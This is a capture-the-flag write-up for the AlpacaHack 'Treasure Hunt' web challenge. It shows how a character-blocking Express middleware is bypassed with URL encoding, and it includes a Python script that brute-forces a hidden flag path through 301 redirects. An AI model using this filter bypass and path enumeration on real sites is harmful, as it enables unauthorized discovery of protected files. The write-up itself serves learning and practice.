Treasure Hunt
Table of Contents
Overview
- 71 solves / 116 points
- Author: @ark
- Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆
Background
Can you find a treasure?
Enumeration
Index page:
In here, we can go to different paths, such as /book
:
Which is just a book emoji.
However, if we go to /alpaca
, it says “Bad URL: /alpaca”:
Hmm… Why is that? Let’s read the source code of this web application and figure out why.
In this challenge, we can download a file:
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|15:10:58(HKT)]
└> file treasure-hunt.tar.gz
treasure-hunt.tar.gz: gzip compressed data, from Unix, original size modulo 2^32 51200
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|15:11:00(HKT)]
└> tar xvzf treasure-hunt.tar.gz
treasure-hunt/
treasure-hunt/compose.yaml
treasure-hunt/web/
treasure-hunt/web/index.js
treasure-hunt/web/package.json
treasure-hunt/web/package-lock.json
treasure-hunt/web/Dockerfile
treasure-hunt/web/public/
treasure-hunt/web/public/key
[...]
After reading the source code, we can find that this is a very simple web application written in JavaScript with Express.js framework.
In web/Dockerfile
, we can also see that the flag file is in a very weird path:
# Create flag.txt
RUN echo 'Alpaca{REDACTED}' > ./flag.txt
# Move flag.txt to $FLAG_PATH
RUN FLAG_PATH=./public/$(md5sum flag.txt | cut -c-32 | fold -w1 | paste -sd /)/f/l/a/g/./t/x/t \
&& mkdir -p $(dirname $FLAG_PATH) \
&& mv flag.txt $FLAG_PATH
Assume the flag’s MD5 hash is 3876917cbd1b3db12e39587c66ac2891
, the flag path is something like this:
./public/3/8/7/6/9/1/7/c/<snipped_md5_hash_path>/8/9/1/f/l/a/g/t/x/t
Hmm… So we’ll need to brute force the flag’s MD5 hash and get the correct path?
Anyway, why path /alpaca
will return bad URL?
If we take a look at web/index.js
, we can see that every requests must go through this middleware:
app.use((req, res, next) => {
res.type("text");
if (/[flag]/.test(req.url)) {
res.status(400).send(`Bad URL: ${req.url}`);
return;
}
next();
});
In here, if our request’s URL path has character f
, l
, a
, or g
, it’ll return HTTP status 400 with data Bad URL: <our_path>
.
In the above case, path /alpaca
has character a
, which matched the regular expression pattern, thus returning bad URL.
Hmm… Wait, will req.url
automatically perform URL decode? Maybe we can bypass it via URL encoding?
Let’s log req.url
and check it out!
app.use((req, res, next) => {
console.log("[DEBUG] req.url", req.url);
res.type("text");
if (/[flag]/.test(req.url)) {
res.status(400).send(`Bad URL: ${req.url}`);
return;
}
next();
});
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|15:27:15(HKT)]
└> cd treasure-hunt
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt/treasure-hunt)-[2024.12.01|15:27:15(HKT)]
└> docker compose up --build
[...]
Attaching to treasure-hunt-1
GET /%61%6c%70%61%63%61 HTTP/1.1
Host: localhost:3000
Response:
HTTP/1.1 200 OK
[...]
🦙
Log message:
treasure-hunt-1 | [DEBUG] req.url /%61%6c%70%61%63%61
Nope, it doesn’t URL decode our path, and we successfully bypassed the filter!
Now, how can we brute force the flag’s path?
After some trial and error, it seems like when the requested resource is a directory and missing a forward slash like /1
, we’ll be redirected to the correct path, such as /1/
:
GET /3 HTTP/1.1
Host: localhost:3000
Response:
HTTP/1.1 301 Moved Permanently
[...]
Location: /3/
[...]
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Redirecting</title>
</head>
<body>
<pre>Redirecting to /3/</pre>
</body>
</html>
Exploitation
With that said, we can write a Python script to brute force the correct path and get the flag!
solve.py
#!/usr/bin/env python3
import http.client
from string import hexdigits
class Solver:
def __init__(self, baseUrl):
self.baseUrl = baseUrl
self.connection = http.client.HTTPConnection(self.baseUrl.split('http://')[1])
self.MD5_CHARACTER_SET = hexdigits
self.MD5_HEX_LENGTH = 32
def urlEncodeCharacter(character):
return f'%{ord(character):x}'
def bruteForceFlag(self):
flagHash = str()
finalPath = '/'
while True:
for character in self.MD5_CHARACTER_SET:
if len(flagHash) == self.MD5_HEX_LENGTH:
print(f'\n[+] Got flag MD5 hash: {flagHash}')
return finalPath
print(f'[*] Brute forcing character "{character}"', end='\r')
encodedCharacter = Solver.urlEncodeCharacter(character)
path = f'/{encodedCharacter}' if finalPath == '/' else f'{finalPath}/{encodedCharacter}'
self.connection.request("GET", path)
response = self.connection.getresponse()
response.read()
isCorrectCharacter = True if response.status == 301 else False
if not isCorrectCharacter:
continue
finalPath += f'{encodedCharacter}/'
flagHash += character
break
def getFlag(self, flagHashPath):
finalPath = flagHashPath
for character in ['f', 'l', 'a', 'g', 't', 'x', 't']:
encodedCharacter = Solver.urlEncodeCharacter(character)
finalPath += f'{encodedCharacter}/'
finalPath = finalPath.rstrip('/')
print(f'[*] Getting the flag via path: {finalPath}')
self.connection.request("GET", finalPath)
response = self.connection.getresponse()
data = response.read()
flag = data.decode().strip()
print(f'[+] Flag: {flag}')
def solve(self):
flagHashPath = self.bruteForceFlag()
self.getFlag(flagHashPath)
if __name__ == '__main__':
# baseUrl = 'http://localhost:3000' # for local testing
baseUrl = 'http://34.170.146.252:19843'
solver = Solver(baseUrl)
solver.solve()
┌[siunam♥Mercury]-(~/ctf/AlpacaHack-Round-7-(Web)/Treasure-Hunt)-[2024.12.01|16:15:11(HKT)]
└> python3 solve.py
[*] Brute forcing character "f"
[+] Got flag MD5 hash: 4bafb19a7b66cb415eb070ce1a1b2e8f
[*] Getting the flag via path: /%34/%62/%61/%66/%62/%31/%39/%61/%37/%62/%36/%36/%63/%62/%34/%31/%35/%65/%62/%30/%37/%30/%63/%65/%31/%61/%31/%62/%32/%65/%38/%66/%66/%6c/%61/%67/%74/%78/%74
[+] Flag: Alpaca{alpacapacapacakoshitantan}
- Flag:
Alpaca{alpacapacapacakoshitantan}
Conclusion
What we’ve learned:
- Regular expression bypass via URL encoding